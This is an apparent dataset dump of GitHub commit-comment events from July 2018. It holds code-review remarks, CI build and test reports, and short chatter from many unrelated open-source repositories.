{"id":"7925425353","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29613320,"position":null,"line":null,"path":null,"commit_id":"bf13b889e7a41e19db34accd0c601a91bdb58629","created_at":"2018-07-05T20:35:09Z","updated_at":"2018-07-05T20:35:09Z","author_association":"COLLABORATOR","body":"Puzzle `302-891207cd` discovered in   [`templates/catalog/category_pagination.html`](  https://github.com/fidals/shopelectro/blob/master/templates/catalog/category_pagination.html)   and submitted as #402. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-05T20:35:09Z"}
{"id":"7925427403","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29613331,"position":null,"line":null,"path":null,"commit_id":"baab97413dadc54f70ba20b6d7380ab5dcbfb18b","created_at":"2018-07-05T20:35:38Z","updated_at":"2018-07-05T20:35:38Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loonc](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loonc).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loonc-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-05T20:35:38Z"}
{"id":"7925427729","type":"CommitCommentEvent","actor":{"login":"cameronc137"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29613337,"position":69,"line":69,"path":"geometry/materialsOptical_cathode.xml","commit_id":"0968a3cae0084a5ea95ceddcd2831e5e8ae4b50f","created_at":"2018-07-05T20:35:42Z","updated_at":"2018-07-05T20:35:42Z","author_association":"CONTRIBUTOR","body":"We added the \"EFFICIENCY\" property to a material definition, as well as the surface property for that volume. I've heard that people often use 'border surface\" properties to do cathode definitions, but I'm still confused about why defining a sensitive detector with optical efficiencies and turning on optical photon hits hasn't resolved this yet."}},"created_at":"2018-07-05T20:35:42Z"}
{"id":"7925429079","type":"CommitCommentEvent","actor":{"login":"bensku"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29613342,"position":null,"line":null,"path":null,"commit_id":"e4dc64a34b8f683f455befc9296724ad804b71ec","created_at":"2018-07-05T20:36:00Z","updated_at":"2018-07-05T20:36:00Z","author_association":"MEMBER","body":"Double tab characters is what you use when continuing a statement to next line. Solution: don't continue statements to next lines like this. StringBuilder appears to be most readable in this case."}},"created_at":"2018-07-05T20:36:00Z"}
{"id":"7925431422","type":"CommitCommentEvent","actor":{"login":"nzjony"},"repo":{"name":"equippers/equippers.de"},"payload":{"comment":{"id":29613348,"position":null,"line":null,"path":null,"commit_id":"d0f51d6b622d573770807177b4504fde99a3282c","created_at":"2018-07-05T20:36:33Z","updated_at":"2018-07-05T20:36:33Z","author_association":"CONTRIBUTOR","body":"Don't submit, this is just to show @simonhaenisch my progress "}},"created_at":"2018-07-05T20:36:33Z"}
{"id":"7925433386","type":"CommitCommentEvent","actor":{"login":"Shroompow"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29613352,"position":null,"line":null,"path":null,"commit_id":"29bca17b021c2b2d4c1bfa9cb67412e593cb9cc6","created_at":"2018-07-05T20:37:00Z","updated_at":"2018-07-05T20:37:00Z","author_association":"OWNER","body":"Orgasizatiom"}},"created_at":"2018-07-05T20:37:00Z"}
{"id":"7925433870","type":"CommitCommentEvent","actor":{"login":"decentralion"},"repo":{"name":"sourcecred/sourcecred"},"payload":{"comment":{"id":29613353,"position":null,"line":null,"path":null,"commit_id":"1cda37e91aed1ace0dd690eebe567afdd330e0b7","created_at":"2018-07-05T20:37:06Z","updated_at":"2018-07-05T20:37:06Z","author_association":"MEMBER","body":"See https://github.com/sourcecred/sourcecred/pull/482#issuecomment-402845120. Also, you're banned."}},"created_at":"2018-07-05T20:37:06Z"}
{"id":"7925435152","type":"CommitCommentEvent","actor":{"login":"btford"},"repo":{"name":"uber-web/type-analyzer"},"payload":{"comment":{"id":29613357,"position":17,"line":40,"path":"test/basic-types-test.js","commit_id":"7ea836097b1bab8a814aa78535b0b2863d866015","created_at":"2018-07-05T20:37:22Z","updated_at":"2018-07-05T20:37:22Z","author_association":"NONE","body":"\"freak out\" lol"}},"created_at":"2018-07-05T20:37:22Z"}
{"id":"7925436595","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/pakmail-franchising"},"payload":{"comment":{"id":29613361,"position":null,"line":null,"path":null,"commit_id":"b3667202ab06cea6031c08a813a728e24944c89e","created_at":"2018-07-05T20:37:41Z","updated_at":"2018-07-05T20:37:41Z","author_association":"COLLABORATOR","body":"Created multidev environment [pakmail-franchising#ci-56](https://dashboard.pantheon.io/sites/8a4447b4-69fe-419a-b0ba-20c6317d8b0c#ci-56).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-56-pakmail-franchising.pantheonsite.io/)"}},"created_at":"2018-07-05T20:37:41Z"}
{"id":"7925438661","type":"CommitCommentEvent","actor":{"login":"btford"},"repo":{"name":"uber-web/type-analyzer"},"payload":{"comment":{"id":29613368,"position":32,"line":50,"path":"test/basic-types-test.js","commit_id":"7ea836097b1bab8a814aa78535b0b2863d866015","created_at":"2018-07-05T20:38:11Z","updated_at":"2018-07-05T20:38:11Z","author_association":"NONE","body":"would omit `correctly` here (and in other places)"}},"created_at":"2018-07-05T20:38:11Z"}
{"id":"7925439656","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29613373,"position":null,"line":null,"path":null,"commit_id":"119ef16a3f951a0fbacb66799f89b876d81f128a","created_at":"2018-07-05T20:38:25Z","updated_at":"2018-07-05T20:38:25Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2929 of 2932 tests passed, 10 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO small diffs.\n * 2 tests had: MTR small diffs.\n * 3 tests had: ESO big diffs.\n * 1 test had: Table small diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-119ef16a3f951a0fbacb66799f89b876d81f128a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-119ef16a3f951a0fbacb66799f89b876d81f128a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-05T20:38:25Z"}
{"id":"7925440069","type":"CommitCommentEvent","actor":{"login":"AsafSH6"},"repo":{"name":"DeepSpace2/StyleFrame"},"payload":{"comment":{"id":29613378,"position":29,"line":178,"path":"StyleFrame/style_frame.py","commit_id":"49f7439883df31a2bfa973f5a56e3405eed24d47","created_at":"2018-07-05T20:38:31Z","updated_at":"2018-07-05T20:38:31Z","author_association":"COLLABORATOR","body":"Maybe it's better to do this at the beginning of the method."}},"created_at":"2018-07-05T20:38:31Z"}
{"id":"7925441098","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29613379,"position":null,"line":null,"path":null,"commit_id":"adf6b247cac54b3d78dbca5d901e96db62e04972","created_at":"2018-07-05T20:38:46Z","updated_at":"2018-07-05T20:38:46Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf6b247cac54b3d78dbca5d901e96db62e04972-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf6b247cac54b3d78dbca5d901e96db62e04972-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf6b247cac54b3d78dbca5d901e96db62e04972-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.18%25-green.png)</a>\n"}},"created_at":"2018-07-05T20:38:46Z"}
{"id":"7925458449","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29613421,"position":null,"line":null,"path":null,"commit_id":"03663c40a46309ba9cb50ed8b328d55764b17043","created_at":"2018-07-05T20:42:41Z","updated_at":"2018-07-05T20:42:41Z","author_association":"CONTRIBUTOR","body":"@Etaglibash Estas seguro de estos cambios?"}},"created_at":"2018-07-05T20:42:41Z"}
{"id":"7925458985","type":"CommitCommentEvent","actor":{"login":"ericsoco"},"repo":{"name":"uber-web/type-analyzer"},"payload":{"comment":{"id":29613423,"position":17,"line":40,"path":"test/basic-types-test.js","commit_id":"7ea836097b1bab8a814aa78535b0b2863d866015","created_at":"2018-07-05T20:42:49Z","updated_at":"2018-07-05T20:42:49Z","author_association":"NONE","body":"This is prod-quality code man! Don't you forget it."}},"created_at":"2018-07-05T20:42:49Z"}
{"id":"7925459646","type":"CommitCommentEvent","actor":{"login":"jonathankamau"},"repo":{"name":"swanjala/MusePad"},"payload":{"comment":{"id":29613427,"position":3,"line":7,"path":"app/models.py","commit_id":"b2d7168382b64ff0ace7b621d992e956f8a389b5","created_at":"2018-07-05T20:42:58Z","updated_at":"2018-07-05T20:42:58Z","author_association":"COLLABORATOR","body":"add docstrings to your model classes describing what each model represents."}},"created_at":"2018-07-05T20:42:58Z"}
{"id":"7925462694","type":"CommitCommentEvent","actor":{"login":"rabits"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29613432,"position":18,"line":47,"path":"packages/bsp/common/usr/lib/armbian/armbian-hardware-optimization","commit_id":"75e17b0e21fac1b05bd9ab84c4e479316e38c957","created_at":"2018-07-05T20:43:39Z","updated_at":"2018-07-05T20:43:39Z","author_association":"CONTRIBUTOR","body":"Seems causing improper replace of `postrotate` action in `/etc/logrotate.d/rsyslog`. Issue #1033"}},"created_at":"2018-07-05T20:43:39Z"}
{"id":"7925463535","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29613437,"position":7,"line":10,"path":"auth/server/dal/loginRepo.js","commit_id":"33b77a64cf7cff2c410836b8b73061942627ff09","created_at":"2018-07-05T20:43:52Z","updated_at":"2018-07-05T20:43:52Z","author_association":"COLLABORATOR","body":"Why toString()?"}},"created_at":"2018-07-05T20:43:52Z"}
{"id":"7925463643","type":"CommitCommentEvent","actor":{"login":"jchesterpivotal"},"repo":{"name":"topherbullock/knative-build-pipeline-poc"},"payload":{"comment":{"id":29613441,"position":null,"line":null,"path":null,"commit_id":"878c6a7bf17e201d1c277cc19325f01dae5893f1","created_at":"2018-07-05T20:43:53Z","updated_at":"2018-07-05T20:43:53Z","author_association":"COLLABORATOR","body":"it's all a LIE"}},"created_at":"2018-07-05T20:43:53Z"}
{"id":"7925465421","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29613445,"position":null,"line":null,"path":null,"commit_id":"207158531e97fac46cfaa6a46c66601e4b30fbf9","created_at":"2018-07-05T20:44:18Z","updated_at":"2018-07-05T20:44:18Z","author_association":"OWNER","body":"We (Spencer, Dan and I) discussed the need for this earlier today.  We need to be able to make 'local definitions' which are only visible within a limited scope.\r\n\r\nHowever, in this case, these constants seem to be \"global\", but just in a separate section.\r\n\r\nFor now, I think we need to add some kind of 'Scope' field to (at least) `DataDefinition`. Note how we already have something sort-of like this for symbols, which can differ between document and code, as well as be 'scoped' to just one by only being partially defined."}},"created_at":"2018-07-05T20:44:18Z"}
{"id":"7925466503","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29613449,"position":null,"line":null,"path":null,"commit_id":"c6db09d5c233779589255426b5d594ee2b920ac6","created_at":"2018-07-05T20:44:32Z","updated_at":"2018-07-05T20:44:32Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#pr-32](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#pr-32).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-32-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-05T20:44:32Z"}
{"id":"7925466981","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29613451,"position":10,"line":10,"path":"auth/server/dal/loginRepo.js","commit_id":"33b77a64cf7cff2c410836b8b73061942627ff09","created_at":"2018-07-05T20:44:39Z","updated_at":"2018-07-05T20:44:39Z","author_association":"COLLABORATOR","body":"All this logic should be in the service, from line 10 to the end"}},"created_at":"2018-07-05T20:44:39Z"}
{"id":"7925467392","type":"CommitCommentEvent","actor":{"login":"jonathankamau"},"repo":{"name":"swanjala/MusePad"},"payload":{"comment":{"id":29613452,"position":3,"line":7,"path":"app/models.py","commit_id":"b2d7168382b64ff0ace7b621d992e956f8a389b5","created_at":"2018-07-05T20:44:44Z","updated_at":"2018-07-05T20:44:44Z","author_association":"COLLABORATOR","body":"Try having a model base class from which other model classes will inherit common db fields "}},"created_at":"2018-07-05T20:44:44Z"}
{"id":"7925467755","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29613453,"position":78,"line":78,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T20:44:49Z","updated_at":"2018-07-05T20:44:49Z","author_association":"MEMBER","body":"i didn't mean to imply we did, im just saying it's not something uncommon"}},"created_at":"2018-07-05T20:44:49Z"}
{"id":"7925470648","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29613461,"position":null,"line":null,"path":null,"commit_id":"5e3833059272e8a676927012eace0a490d8131de","created_at":"2018-07-05T20:45:29Z","updated_at":"2018-07-05T20:45:29Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-411](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-411).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-411-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-05T20:45:29Z"}
{"id":"7925476991","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29613475,"position":21,"line":15,"path":"auth/server/services/login.js","commit_id":"33b77a64cf7cff2c410836b8b73061942627ff09","created_at":"2018-07-05T20:46:55Z","updated_at":"2018-07-05T20:46:55Z","author_association":"COLLABORATOR","body":"Dont put the password, because thats not secure, you need to put the id, email and userName"}},"created_at":"2018-07-05T20:46:55Z"}
{"id":"7925482091","type":"CommitCommentEvent","actor":{"login":"DeepSpace2"},"repo":{"name":"DeepSpace2/StyleFrame"},"payload":{"comment":{"id":29613491,"position":29,"line":178,"path":"StyleFrame/style_frame.py","commit_id":"49f7439883df31a2bfa973f5a56e3405eed24d47","created_at":"2018-07-05T20:48:02Z","updated_at":"2018-07-05T20:48:02Z","author_association":"OWNER","body":"Well, this is the actual beginning of the method. Everything above is just defining inner functions :) I think it is more organized this way."}},"created_at":"2018-07-05T20:48:02Z"}
{"id":"7925484266","type":"CommitCommentEvent","actor":{"login":"williamsiuhang"},"repo":{"name":"3merge/crg"},"payload":{"comment":{"id":29613501,"position":null,"line":null,"path":null,"commit_id":"7b1b8cd73bf28196777270f151dd5feea15cedc7","created_at":"2018-07-05T20:48:32Z","updated_at":"2018-07-05T20:48:32Z","author_association":"CONTRIBUTOR","body":"Search input & alphabet filtering refresh each other (only one filter at a time). Can be changed by not calling 'clear_searchinput(), clear_letterbutton()'.\r\n\r\nCategories' filter act as a separate condition/filter, it won't reset search/alphabet filter values."}},"created_at":"2018-07-05T20:48:32Z"}
{"id":"7925488698","type":"CommitCommentEvent","actor":{"login":"ilia3101"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29613514,"position":null,"line":null,"path":null,"commit_id":"cc6429b67e954bd427a47b1b0a8d6a300b9d51d3","created_at":"2018-07-05T20:49:29Z","updated_at":"2018-07-05T20:49:29Z","author_association":"OWNER","body":"❤️ "}},"created_at":"2018-07-05T20:49:29Z"}
{"id":"7925490378","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29613525,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-05T20:49:51Z","updated_at":"2018-07-05T20:49:51Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2309 of 2309 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-05T20:49:51Z"}
{"id":"7925490869","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29613527,"position":null,"line":null,"path":null,"commit_id":"2ac28be6a8b5caa761c23fe682a665d64aa2d4a8","created_at":"2018-07-05T20:49:58Z","updated_at":"2018-07-05T20:49:58Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 491](https://ci.hashicorp.engineering/viewLog.html?buildId=101487&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-05T20:49:58Z"}
{"id":"7925499517","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29613542,"position":null,"line":null,"path":null,"commit_id":"b8b6ef3f5f935343dfcf17cda40a8f754d87e2dc","created_at":"2018-07-05T20:51:52Z","updated_at":"2018-07-05T20:51:52Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/73/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/73//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/b8b6ef3f5f935343dfcf17cda40a8f754d87e2dc/73/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/b8b6ef3f5f935343dfcf17cda40a8f754d87e2dc/73/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/b8b6ef3f5f935343dfcf17cda40a8f754d87e2dc/73/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/b8b6ef3f5f935343dfcf17cda40a8f754d87e2dc/73/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-05T20:51:52Z"}
{"id":"7925500373","type":"CommitCommentEvent","actor":{"login":"TheNightmanCodeth"},"repo":{"name":"TheNightmanCodeth/Macro"},"payload":{"comment":{"id":29613544,"position":null,"line":null,"path":null,"commit_id":"e543da58a08c94ad3f16a5f7b84b7b4e774e18ef","created_at":"2018-07-05T20:52:04Z","updated_at":"2018-07-05T20:52:04Z","author_association":"OWNER","body":"This is a monolith commit because this project used to be hosted on Gitlab. I lost my 2FA keys so bye gitlab(:"}},"created_at":"2018-07-05T20:52:04Z"}
{"id":"7925504280","type":"CommitCommentEvent","actor":{"login":"nathanchance"},"repo":{"name":"MotoZ-2016/android_kernel_motorola_msm8996"},"payload":{"comment":{"id":29613558,"position":null,"line":null,"path":null,"commit_id":"483f037a2c89a043f50a15dcf6bc982b2988da1e","created_at":"2018-07-05T20:52:55Z","updated_at":"2018-07-05T20:52:55Z","author_association":"NONE","body":"I feel like this is a better fix: https://github.com/nathanchance/wahoo/commit/420ee54b7f3c088c4c1c36f8276a8affbb283411"}},"created_at":"2018-07-05T20:52:55Z"}
{"id":"7925506967","type":"CommitCommentEvent","actor":{"login":"TheNightmanCodeth"},"repo":{"name":"TheNightmanCodeth/Macro"},"payload":{"comment":{"id":29613561,"position":null,"line":null,"path":null,"commit_id":"e543da58a08c94ad3f16a5f7b84b7b4e774e18ef","created_at":"2018-07-05T20:53:30Z","updated_at":"2018-07-05T20:53:30Z","author_association":"OWNER","body":"Also looks like I forgot to obfuscate my api keys. Guess this repo is private now((((((((((((((:"}},"created_at":"2018-07-05T20:53:30Z"}
{"id":"7925509673","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29613570,"position":206,"line":121,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:54:08Z","updated_at":"2018-07-05T20:54:08Z","author_association":"NONE","body":"YOU NEED TO WAIT ON A FENCE HERE IF ONE WAS SET\r\n\r\nOTHERWISE YOU RISK STOMPING AND MODIFYING A BUFFER THAT THE GPU IS CURRENTLY USING!"}},"created_at":"2018-07-05T20:54:08Z"}
{"id":"7925512454","type":"CommitCommentEvent","actor":{"login":"reinadelospatos"},"repo":{"name":"reinadelospatos/iamnereweb"},"payload":{"comment":{"id":29613574,"position":null,"line":null,"path":null,"commit_id":"fc67b10835f100d7d64f3d6818ef2ceddc7e9d36","created_at":"2018-07-05T20:54:44Z","updated_at":"2018-07-05T20:54:44Z","author_association":"OWNER","body":"Create new branch"}},"created_at":"2018-07-05T20:54:44Z"}
{"id":"7925514095","type":"CommitCommentEvent","actor":{"login":"davetcoleman"},"repo":{"name":"isys-vision/rviz_visual_tools"},"payload":{"comment":{"id":29613575,"position":null,"line":null,"path":null,"commit_id":"65835849130b49562db53ea5da63a2ae51c6180f","created_at":"2018-07-05T20:55:08Z","updated_at":"2018-07-05T20:55:08Z","author_association":"NONE","body":"yes it certainly should, i'll cherry pick it now\r\n\r\nCMake 3.0.2 is required for catkin, so that should be fine. i'll also update the version number"}},"created_at":"2018-07-05T20:55:08Z"}
{"id":"7925516744","type":"CommitCommentEvent","actor":{"login":"guimossi"},"repo":{"name":"guimossi/questao1ed"},"payload":{"comment":{"id":29613581,"position":null,"line":null,"path":null,"commit_id":"71a787147f9353f81d8dcb45a794406015c7e218","created_at":"2018-07-05T20:55:41Z","updated_at":"2018-07-05T20:55:41Z","author_association":"OWNER","body":"codigo"}},"created_at":"2018-07-05T20:55:41Z"}
{"id":"7925517299","type":"CommitCommentEvent","actor":{"login":"erfanoabdi"},"repo":{"name":"MotoZ-2016/android_kernel_motorola_msm8996"},"payload":{"comment":{"id":29613582,"position":null,"line":null,"path":null,"commit_id":"483f037a2c89a043f50a15dcf6bc982b2988da1e","created_at":"2018-07-05T20:55:48Z","updated_at":"2018-07-05T20:55:48Z","author_association":"MEMBER","body":"oh yeah, thanks for looking here :)"}},"created_at":"2018-07-05T20:55:48Z"}
{"id":"7925517661","type":"CommitCommentEvent","actor":{"login":"Ostap87"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29613583,"position":null,"line":null,"path":null,"commit_id":"7dba914cd943ece381cac88b0e2f796125160a55","created_at":"2018-07-05T20:55:53Z","updated_at":"2018-07-05T20:55:53Z","author_association":"COLLABORATOR","body":"Something! Something! Something!"}},"created_at":"2018-07-05T20:55:53Z"}
{"id":"7925518832","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29613584,"position":212,"line":184,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:56:09Z","updated_at":"2018-07-05T20:56:09Z","author_association":"NONE","body":"there's no reason for this entire scope/code-block to exist\r\n\r\nsome of it should be moved to https://github.com/Crisspl/IrrlichtBAW/commit/bd417b85e3efd7710a5b4bcf18bfec232c7b2e44#diff-b73f375b9119a9136ad6550281030965R202"}},"created_at":"2018-07-05T20:56:09Z"}
{"id":"7925519028","type":"CommitCommentEvent","actor":{"login":"sirn"},"repo":{"name":"omisego/ewallet"},"payload":{"comment":{"id":29613587,"position":28,"line":28,"path":"apps/ewallet_db/lib/ewallet_db/helpers/crypto.ex","commit_id":"1802c359539394057ae2022a9a0b5ed4f8ff8ccb","created_at":"2018-07-05T20:56:11Z","updated_at":"2018-07-05T20:56:11Z","author_association":"MEMBER","body":"Sorry, I missed this. I think you forgot `padding: false`"}},"created_at":"2018-07-05T20:56:11Z"}
{"id":"7925520820","type":"CommitCommentEvent","actor":{"login":"stickbreaker"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29613592,"position":70,"line":100,"path":"libraries/WiFi/src/WiFiClient.cpp","commit_id":"9efecc1be03a7f319df1d86b58f56ae73a6ae510","created_at":"2018-07-05T20:56:35Z","updated_at":"2018-07-05T20:56:35Z","author_association":"CONTRIBUTOR","body":"Why attempt to fill the buffer on every read, what about checking if requested count is already in buffer, else fillbuffer?\r\n\r\nChuck"}},"created_at":"2018-07-05T20:56:35Z"}
{"id":"7925522913","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29613600,"position":210,"line":182,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T20:57:04Z","updated_at":"2018-07-05T20:57:04Z","author_association":"NONE","body":"Only flush for TEST_CASE 3"}},"created_at":"2018-07-05T20:57:04Z"}
{"id":"7925524905","type":"CommitCommentEvent","actor":{"login":"maheshbakshi"},"repo":{"name":"maheshbakshi/AutoSuggestion"},"payload":{"comment":{"id":29613604,"position":1,"line":1,"path":"Specifications.xml","commit_id":"16fe3096716e257b391db0e9471a080d127f7013","created_at":"2018-07-05T20:57:31Z","updated_at":"2018-07-05T20:57:31Z","author_association":"OWNER","body":"Delete this file. This file needs to be in AutoSuggestionData"}},"created_at":"2018-07-05T20:57:31Z"}
{"id":"7925525715","type":"CommitCommentEvent","actor":{"login":"maheshbakshi"},"repo":{"name":"maheshbakshi/AutoSuggestion"},"payload":{"comment":{"id":29613608,"position":1,"line":1,"path":"UnitTest1_Specifications.xml","commit_id":"16fe3096716e257b391db0e9471a080d127f7013","created_at":"2018-07-05T20:57:41Z","updated_at":"2018-07-05T20:57:41Z","author_association":"OWNER","body":"Delete this file. This file needs to be in AutoSuggestionData"}},"created_at":"2018-07-05T20:57:41Z"}
{"id":"7925526249","type":"CommitCommentEvent","actor":{"login":"davetcoleman"},"repo":{"name":"isys-vision/rviz_visual_tools"},"payload":{"comment":{"id":29613610,"position":null,"line":null,"path":null,"commit_id":"65835849130b49562db53ea5da63a2ae51c6180f","created_at":"2018-07-05T20:57:48Z","updated_at":"2018-07-05T20:57:48Z","author_association":"NONE","body":"https://github.com/PickNikRobotics/rviz_visual_tools/pull/86/files"}},"created_at":"2018-07-05T20:57:48Z"}
{"id":"7925526299","type":"CommitCommentEvent","actor":{"login":"maheshbakshi"},"repo":{"name":"maheshbakshi/AutoSuggestion"},"payload":{"comment":{"id":29613611,"position":1,"line":1,"path":"UnitTest_cities_canada-usa.tsv","commit_id":"16fe3096716e257b391db0e9471a080d127f7013","created_at":"2018-07-05T20:57:49Z","updated_at":"2018-07-05T20:57:49Z","author_association":"OWNER","body":"Delete this file. This file needs to be in AutoSuggestionData"}},"created_at":"2018-07-05T20:57:49Z"}
{"id":"7925527703","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29613618,"position":null,"line":null,"path":null,"commit_id":"2ac28be6a8b5caa761c23fe682a665d64aa2d4a8","created_at":"2018-07-05T20:58:09Z","updated_at":"2018-07-05T20:58:09Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 492](https://ci.hashicorp.engineering/viewLog.html?buildId=101488&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-05T20:58:09Z"}
